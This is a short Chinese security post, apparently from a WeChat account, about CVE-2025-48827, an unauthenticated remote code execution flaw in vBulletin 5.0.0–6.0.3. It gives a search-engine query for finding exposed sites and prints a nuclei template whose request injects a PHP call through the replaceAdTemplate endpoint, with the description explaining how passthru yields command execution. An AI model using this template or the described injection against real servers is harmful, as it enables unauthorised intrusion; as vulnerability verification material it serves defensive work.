CVE-2025-48827：vbulletin代码执行POC

z1 Z1sec 2025-06-04 06:32

免责声明：

由于传播、利用本公众号Z1sec所提供的信息而造成的任何直接或者间接的后果及损失，均由使用者本人负责，公众号及作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

vBulletin中的关键未经身份验证的API访问

POC详细：关注公众号回复“0604”

搜索引擎：app=”vBulletin”

nuclei验证：

id: vbulletin-replacead-rceinfo:name:vBulletinreplaceAdTemplate-RemoteCodeExecutionauthor:DhiyaneshDKseverity:criticaldescription:|    vBulletin versions 5.0.0 through 6.0.3 contain a Remote Code Execution (RCE) vulnerability in the ajax/api/ad/replaceAdTemplate endpoint. This flaw arises from improper use of PHP's Reflection API, allowing unauthenticated attackers to invoke protected controller methods. By injecting a crafted <vb:if> conditional that executes arbitrary PHP code via passthru($_POST[<param>]), and triggering it with a second request to ajax/render/ad_<location>, attackers can run arbitrary commands on the server as the webserver user.impact:|    Successful exploitation allows unauthenticated remote attackers to execute arbitrary system commands as the web server user, resulting in full system compromise.remediation:|    Upgrade to vBulletin 6.0.4+ and apply the official patch to restrict access to protected controller methods and secure the ajax/api/ad/replaceAdTemplate endpoint.reference:    -https://karmainsecurity.com/pocs/vBulletin-replaceAdTemplate-RCE.php    -https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rceclassification:    cpe:cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*metadata:    verified:true    max-request:1    vendor:vbulletin    product:vbulletin    fofa-query:app="vBulletin"    shodan-query:http.component:"vBulletin"tags:rce,vbulletin,intrusivevariables:rand_string:"{{to_lower(rand_base(5))}}"rand_value:"{{to_lower(rand_text_alpha(5))}}"http:-raw:      -|        POST / HTTP/1.1        Host: {{Hostname}}        Content-Type: application/x-www-form-urlencoded        routestring=ajax/api/ad/replaceAdTemplate&styleid=1&location={{rand_string}}&template=<vb:ifcondition='"var_dump"("{{rand_value}}")'></vb:if>    matchers:      -type:dsl        dsl:          -contains(content_type,'application/json')          -contains_all(body,'string(5)','{{rand_value}}')          -status_code==200        condition:and# digest: 4a0a00473045022039d5fe53f2231bbabadaf62fc548eedf67c6fbffc543aa29a6e96fcd690d9f3d022100a7d55e33136c01b5c3bbbe57691e3cddbc419cba3c4fcf24c313d1e3fe71795b:922c64590222798bb761d5b6d8e72950